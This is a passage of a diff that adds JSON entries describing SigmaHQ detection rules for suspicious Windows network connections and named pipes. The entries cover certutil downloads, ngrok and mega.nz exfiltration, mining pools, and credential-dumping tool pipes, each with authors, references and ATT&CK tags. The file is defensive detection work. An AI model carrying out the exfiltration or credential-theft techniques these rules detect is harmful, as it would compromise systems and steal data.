"logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_certutil.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "0dba975d-a193-4ed1-a067-424df57570d1", + "value": "Certutil Initiated Connection" + }, + { + "description": "Detects process connections to a Monero crypto mining pool", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "filename": "net_connection_win_crypto_mining.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_crypto_mining.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496" + ] + }, + "uuid": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "value": "Windows Crypto Mining Pool Connections" + }, + { + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "meta": { + "author": "Sorina Ionescu", + "creation_date": "2022/08/17", + "falsepositive": [ + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + ], + "filename": "net_connection_win_dead_drop_resolvers.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://content.fireeye.com/apt-41/rpt-apt41", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", + "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" + ] + }, + "uuid": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "value": "Dead Drop Resolvers" + }, + { + "description": "Detects Dllhost that communicates with public IP addresses", + "meta": { + "author": "bartblaze", + "creation_date": "2020/07/13", + "falsepositive": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "filename": "net_connection_win_dllhost_net_connections.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution", + "attack.t1559.001" + ] + }, + "uuid": "cfed2f44-16df-4bf3-833a-79405198b277", + "value": "Dllhost Internet Connection" + }, + { + "description": "Detects network connections from Equation Editor", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/04/14", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_eqnedt.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/forensicitguy/status/1513538712986079238", + "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203" + ] + }, + "uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "value": "Equation Editor Network Connection" + }, + { + "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", + "creation_date": "2021/11/10", + "falsepositive": [ + "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", + "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", + "It is highly recommended to baseline your activity and tune out common business use cases." + ], + "filename": "net_connection_win_excel_outbound_network_connection.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://corelight.com/blog/detecting-cve-2021-42292", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_excel_outbound_network_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203" + ] + }, + "uuid": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", + "value": "Excel Network Connections" + }, + { + "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_hh.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ] + }, + "uuid": "468a8cea-2920-4909-a593-0cbe1d96674a", + "value": "HH.EXE Network Connections" + }, + { + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Legitimate script" + ], + "filename": "net_connection_win_imewdbld.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", + "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "8d7e392e-9b28-49e1-831d-5949c6281228", + "value": "Download a File with IMEWDBLD.exe" + }, + { + "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/19", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_malware_backconnect_ports.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1571" + ] + }, + "uuid": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "value": "Suspicious Typical Malware Back Connect Ports" + }, + { + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/06", + "falsepositive": [ + "Legitimate use of mega.nz uploaders and tools" + ], + "filename": "net_connection_win_mega_nz.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://megatools.megous.com/", + "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.001" + ] + }, + "uuid": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", + "value": "Communication To Mega.nz" + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/16", + "falsepositive": [ + "Legitimate msiexec over networks" + ], + "filename": "net_connection_win_msiexec.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", + "value": "Msiexec Initiated Connection" + }, + { + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/16", + "falsepositive": [ + "Legitimate use of ngrok.io" + ], + "filename": "net_connection_win_ngrok_io.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://ngrok.com/", + "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.001" + ] + }, + "uuid": "18249279-932f-45e2-b37a-8925f2597670", + "value": "Communication To Ngrok.Io" + }, + { + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/03", + "falsepositive": [ + "Legitimate use of ngrok" + ], + "filename": "net_connection_win_ngrok_tunnel.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/hakluke/status/1587733971814977537/photo/1", + "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" + ] + }, + "uuid": "1d08ac94-400d-4469-a82f-daee9a908849", + "value": "Communication To Ngrok Tunneling Service" + }, + { + "description": "Detects suspicious network connection by Notepad", + "meta": { + "author": "EagleEye Team", + "creation_date": "2020/05/14", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_notepad_network_connection.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf", + "https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad_network_connection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.execution", + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "value": "Notepad Making Network Connection" + }, + { + "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/13", + "falsepositive": [ + "Administrative scripts", + "Microsoft IP range" + ], + "filename": "net_connection_win_powershell_network_connection.yml", + "level": "low", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.youtube.com/watch?v=DLtJTxMWZ2o", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1f21ec3f-810d-4b0e-8045-322202e22b4b", + "value": "PowerShell Network Connections" + }, + { + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Legitimate python script" + ], + "filename": "net_connection_win_python.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", + "https://pypi.org/project/scapy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", + "value": "Python Initiated Connection" + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/02/16", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_rdp_reverse_tunnel.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1096148422984384514", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "value": "RDP Over Reverse SSH Tunnel" + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/29", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_rdp_to_http.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "value": "RDP to HTTP or HTTPS Target Ports" + }, + { + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "meta": { + "author": "Dmitriy Lifanov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_regsvr32_network_activity.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "value": "Regsvr32 Network Activity" + }, + { + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", + "falsepositive": [ + "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", + "Network Service user name of a not-covered localization" + ], + "filename": "net_connection_win_remote_powershell_session_network.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_remote_powershell_session_network.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "value": "Remote PowerShell Session (Network)" + }, + { + "description": "Detects a rundll32 that communicates with public IP addresses", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/04", + "falsepositive": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "filename": "net_connection_win_rundll32_net_connections.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.execution" + ] + }, + "uuid": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "value": "Rundll32 Internet Connection" + }, + { + "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/28", + "falsepositive": [ + "Legitimate scripts" + ], + "filename": "net_connection_win_script.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "08249dc0-a28d-4555-8ba5-9255a198e08c", + "value": "Script Initiated Connection" + }, + { + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/08/28", + "falsepositive": [ + "Legitimate scripts" + ], + "filename": "net_connection_win_script_wan.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script_wan.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "value": "Script Initiated Connection to Non-Local Network" + }, + { + "description": "Detects a possible remote connections to Silenttrinity c2", + "meta": { + "author": "Kiran kumar s, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.t1127.001" + ] + }, + "uuid": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "value": "Silenttrinity Stager Msbuild Activity" + }, + { + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_binary_no_cmdline.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "20384606-a124-4fec-acbb-8bd373728613", + "value": "Suspicious Network Connection Binary No CommandLine" + }, + { + "description": "Detects suspicious network connection by Cmstp", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_cmstp.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_cmstp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003" + ] + }, + "uuid": "efafe0bf-4238-479e-af8f-797bd3490d2d", + "value": "Cmstp Making Network Connection" + }, + { + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/20", + "falsepositive": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "filename": "net_connection_win_susp_dropbox_api.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", + "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" + ], + "tags": "No established tags" + }, + "uuid": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "value": "Suspicious Dropbox API Usage" + }, + { + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "meta": { + "author": "frack113, Tim Shelton (fps)", + "creation_date": "2022/07/14", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_epmap.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/RiccardoAncarani/TaskShell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_epmap.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "value": "Suspicious Epmap Connection" + }, + { + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Other browsers" + ], + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/Rubeus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" + ] + }, + "uuid": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "value": "Suspicious Outbound Kerberos Connection" + }, + { + "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", + "meta": { + "author": "elhoim", + "creation_date": "2022/04/28", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_outbound_mobsync_connection.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml" + ], + "tags": [ + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", + "value": "Microsoft Sync Center Suspicious Network Connections" + }, + { + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Other SMTP tools" + ], + "filename": "net_connection_win_susp_outbound_smtp_connections.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "9976fa64-2804-423c-8a5b-646ade840773", + "value": "Suspicious Outbound SMTP Connections" + }, + { + "description": "Detects programs with network connections running in suspicious files system locations", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2017/03/19", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_prog_location_network_connection.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "value": "Suspicious Program Location with Network Connections" + }, + { + "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/05/15", + "falsepositive": [ + "Other Remote Desktop RDP tools", + "Domain controller using dns.exe" + ], + "filename": "net_connection_win_susp_rdp.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_rdp.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", + "value": "Suspicious Outbound RDP Connections" + }, + { + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Legitimate use of wuauclt.exe over the network." + ], + "filename": "net_connection_win_wuauclt_network_connection.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://dtm.uk/wuauclt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "value": "Wuauclt Network Connection" + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "creation_date": "2019/09/12", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter." + ], + "filename": "pipe_created_alternate_powershell_hosts_pipe.yml", + "level": "medium", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_alternate_powershell_hosts_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "58cb02d5-78ce-4692-b3e1-dce850aae41a", + "value": "Alternate PowerShell Hosts Pipe" + }, + { + "description": "Detects a named pipe used by Turla group samples", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/11/06", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_apt_turla_namedpipes.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://attack.mitre.org/groups/G0010/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_apt_turla_namedpipes.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "739915e4-1e70-4778-8b8a-17db02f66db1", + "value": "Turla Group Named Pipes" + }, + { + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "filename": "pipe_created_cred_dump_tools_named_pipes.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_cred_dump_tools_named_pipes.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" + ] + }, + "uuid": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "value": "Cred Dump-Tools Named Pipes" + }, + { + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unlikely" + ], + "filename": "pipe_created_diagtrack_eop_default_pipe.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "1f7025a6-e747-4130-aac4-961eb47015f1", + "value": "DiagTrackEoP Default Named Pipe" + }, + { + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": 